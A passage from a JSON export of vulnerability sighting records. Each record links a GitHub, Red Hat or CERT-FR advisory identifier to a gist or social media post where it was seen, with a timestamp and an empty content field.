"GHSA-jxqq-cqm6-pfq9", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "633cdbc2-d025-4970-a32c-d60d3215dc1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fvqr-27wr-82fm", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "f58ea8f9-b5f5-44e9-9ca6-cc20ef956696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5rq-j2xg-h7qm", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "390866b8-396f-41b0-abfa-e6e587ad99a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35jh-r3h4-6jhm", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "8eeb6ba0-0ec0-4909-b50b-16b254cbc1e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29mw-wpgm-hmr9", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "37cbe930-951a-4b0f-a53c-f9db3839c738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jf85-cpcp-j695", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "9d475eac-6ff0-4c43-8ac4-4e8d25a5f331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc9-xhrj-v574", "type": "seen", "source": "https://gist.github.com/shmil111/fb79705b111af53d22c7d3bdcbd34051", "content": "", "creation_timestamp": "2025-04-03T05:09:00.000000Z"}, {"uuid": "55160325-e27c-4e47-a0b5-b0a683d39a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "f8620a14-a066-4bd2-994a-243ae435f5c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "a4ec6641-f9bd-4874-855f-e0563564b004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "070e8bc7-6f8d-4d05-a35f-aaeebdde0537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p5m-gvpf-f3x5", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "a361a78b-afd6-4ec3-bd3b-ac147ccb2103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68r2-fwcg-qpm8", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "1278d77c-2cb1-419c-af42-41155b4f7fbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "672bb183-910c-4f7c-b665-c07e252bd0d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "8fe08353-78c5-403e-8c56-d155fc22e6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "8d8264f8-8246-46b1-8ee9-b614c709a14b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "c8251145-e76b-4bbc-b5a2-3d141ed5ce5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/ac258bea45025717f0ed3e9461a069c2", "content": "", "creation_timestamp": "2025-07-16T05:32:18.000000Z"}, {"uuid": "587ba34d-b445-4077-b07d-b2b8eb0d19a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "3c9db31a-78ee-4756-ae3d-dbc4231d9407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "c8f52fc1-ee0b-44c5-8bfb-e2e1b488731c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "42947839-a17e-43e2-b1b5-1e1b13ef307d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3ltjooxqx2x2n", "content": "", "creation_timestamp": "2025-07-09T11:13:17.033321Z"}, {"uuid": "1d19fe4d-a449-46f9-8700-c15b437a7dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/b42f1052c55ab49b88d2f9717d4e5f3f", "content": "", "creation_timestamp": "2025-07-16T05:35:19.000000Z"}, {"uuid": "eb1c5720-f4f2-46cb-ab37-33a7a98621a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "fa85d8dd-34e9-461f-b9e5-2c4da634a5fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/86ea8c843cab7db16c46770d57b0192d", "content": "", "creation_timestamp": "2025-07-16T09:38:57.000000Z"}, {"uuid": "3bf66658-ba3c-4d12-9908-7915f89a0d21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/aca4e378e46713da0969c1bf326de5be", "content": "", "creation_timestamp": "2025-07-16T11:28:45.000000Z"}, {"uuid": "06fd4366-996a-41dd-b3a7-8a9631fad7ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/f61224522155355958d6a621efd7cfe8", "content": "", "creation_timestamp": "2025-07-16T12:59:51.000000Z"}, {"uuid": "59c0e2f2-96d7-4876-9008-06d61e9504cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/41bf4d93e6443323e6883db1660999d0", "content": "", "creation_timestamp": "2025-07-16T05:39:42.000000Z"}, {"uuid": "a6f31054-15dc-4ee7-a874-2988728a6aa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "ccdc6a95-4135-40f4-a602-84593c38b0a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "b4422001-07eb-4791-9c7a-0ef8356ce9ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77xx-rxvh-q682", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "cec8acfc-a643-4207-be05-d2a8396a70ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7cbe080ddea3990a063ba37f177cdc19", "content": "", "creation_timestamp": "2025-07-16T11:33:17.000000Z"}, {"uuid": "4451ea03-a661-437d-a413-b9530a1fdc32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/f61224522155355958d6a621efd7cfe8", "content": "", "creation_timestamp": "2025-07-16T12:59:51.000000Z"}, {"uuid": "5eba4954-d3ad-4eb5-be5a-85926fc301e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/e8e3424bccf3e7a7055f855d1c1c8b2a", "content": "", "creation_timestamp": "2025-07-16T13:50:20.000000Z"}, {"uuid": "2cba591e-6659-47b1-be96-54bfd081b440", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/7c3c18d825bd276c1e08ed28ddc07745", "content": "", "creation_timestamp": "2025-07-16T14:32:14.000000Z"}, {"uuid": "d0b626f9-6b4a-406d-beb9-d92015b20b0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/c4c64c45764712e3ac0ba621c5518451", "content": "", "creation_timestamp": "2025-07-16T14:31:41.000000Z"}, {"uuid": "4e9857f3-8552-4b2b-9a59-ff86dd582baf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vr64-r9qj-h27f", "type": "seen", "source": "https://gist.github.com/safer-bot/f110a7e84a54d33302d15922e79756bf", "content": "", "creation_timestamp": "2025-07-16T05:53:12.000000Z"}, {"uuid": "6a85b2e5-c94b-4e8c-a58e-016ac2898c7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jgxc-8mwq-9xqw", "type": "seen", "source": "https://gist.github.com/safer-bot/f110a7e84a54d33302d15922e79756bf", "content": "", "creation_timestamp": "2025-07-16T05:53:12.000000Z"}, {"uuid": "4906aed8-2c29-46f4-a795-02307f0f3293", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "64323ddc-aaf4-4a35-b582-310605723178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "8965d1e1-58b8-4475-9c4c-70aaa859dbfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "d7d7e924-9a15-4caa-ab75-3f1a4f066d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5x8h-m52g-5v54", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114772677323937430", "content": "", "creation_timestamp": "2025-06-30T14:01:14.210584Z"}, {"uuid": "3c663d7f-2333-47fe-a2e4-3aa8cbe39e01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3765-5vjr-qjgm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114813302329985796", "content": "", "creation_timestamp": "2025-07-07T18:12:42.607923Z"}, {"uuid": "e51fd283-6c6a-44e6-903b-5f7bd25d3fb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "b586dce8-9390-421a-80f5-15132cde1c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "f3faec00-69e0-4573-a225-1388fe81ed69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "2a746501-9225-451e-9eb9-d9a9bd66f460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6q3q-6v5j-h6vg", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "da2d4230-f1c1-4de4-98d9-5cdbb53574b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67rr-84xm-4c7r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114791484842582432", "content": "", "creation_timestamp": "2025-07-03T21:44:13.961066Z"}, {"uuid": "11b7ac54-ca57-423a-938e-fd3b440f2ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "1732d88f-8b0d-45e3-bddc-ca85d36a3a79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-chfm-68vv-pvw5", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "5c217a41-1485-49cb-a238-64d49eb64d47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "e505cc0d-e766-4b65-83f6-78b34abe6fcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/cbb77fe8acedeb10838440da5939f071", "content": "", "creation_timestamp": "2025-07-16T05:54:16.000000Z"}, {"uuid": "56beb6fc-e437-47c7-bb7b-f183112efff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "4973a471-eb5c-4f82-a8da-9bcb7009f588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "246d9324-2cdb-4ace-8502-93550c33e62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "de8a17ba-af86-4a53-960c-5cc4f99f5924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/96f439a12abc4994a32c7fc22609444f", "content": "", "creation_timestamp": "2025-07-16T09:45:24.000000Z"}, {"uuid": "5a8a6bf0-0120-489a-946e-702840a9d386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:1453", "type": "seen", "source": "https://gist.github.com/josborn1209/91035ba7ac71db0afd0d59b4fd2c4c92", "content": "", "creation_timestamp": "2025-06-16T18:06:27.000000Z"}, {"uuid": "ba1e571b-a20f-4e1e-baba-4b7b6c8af1b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-023", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lqmrqg4g5222", "content": "", "creation_timestamp": "2025-06-02T12:30:11.553504Z"}, {"uuid": "de153c3f-7796-457a-89e6-7252272cbb4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjv4-ghm7-q58q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819378708595279", "content": "", "creation_timestamp": "2025-07-08T19:58:00.501316Z"}, {"uuid": "845d743e-6c60-4fb9-adc1-678bf4df4abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "2ff35753-2752-4444-b7e4-44e69e6b28da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "88901303-84a5-48e7-b22e-cfd59b563662", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpg-vgmx-xg6w", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "d655d71a-13f7-43e2-92d2-f02b00faf487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "c4a74a8d-4142-444f-950a-f0215babea58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "98d9b754-f54f-46db-8935-2f7b1b623133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "bfd60d64-7a84-4049-b0c4-83110ffdd93b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/f78a1ac32182e44dcc3ec83067c25be8", "content": "", "creation_timestamp": "2025-07-16T05:53:44.000000Z"}, {"uuid": "8beb9482-ef7e-46f1-9561-406c5ac91f73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/6f9270e74a6a657901cb16bdeed9866a", "content": "", "creation_timestamp": "2025-07-16T09:48:13.000000Z"}, {"uuid": "f8714b3a-726b-4ae3-8495-a33f50f1a45b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/6f9270e74a6a657901cb16bdeed9866a", "content": "", "creation_timestamp": "2025-07-16T09:48:13.000000Z"}, {"uuid": "97e860c7-6a04-416d-b350-5c2354d5a8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/6f9270e74a6a657901cb16bdeed9866a", "content": "", "creation_timestamp": "2025-07-16T09:48:13.000000Z"}, {"uuid": "1db1fa21-3c42-4af4-8c91-55bbd619b02f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rwm-xv5j-777p", "type": "seen", "source": "https://gist.github.com/safer-bot/6f9270e74a6a657901cb16bdeed9866a", "content": "", "creation_timestamp": "2025-07-16T09:48:13.000000Z"}, {"uuid": "dca71be5-6e3d-4965-90c2-5ec7395fe6c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-023", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114613774581208216", "content": "", "creation_timestamp": "2025-06-02T12:30:12.064573Z"}, {"uuid": "d625fcc4-b9da-4170-91c1-c323b8038ed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xj56-p8mm-qmxj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114772764637719413", "content": "", "creation_timestamp": "2025-06-30T14:23:26.419604Z"}, {"uuid": "7085cc6c-15e1-4cab-88d2-ee9db5dd2c83", 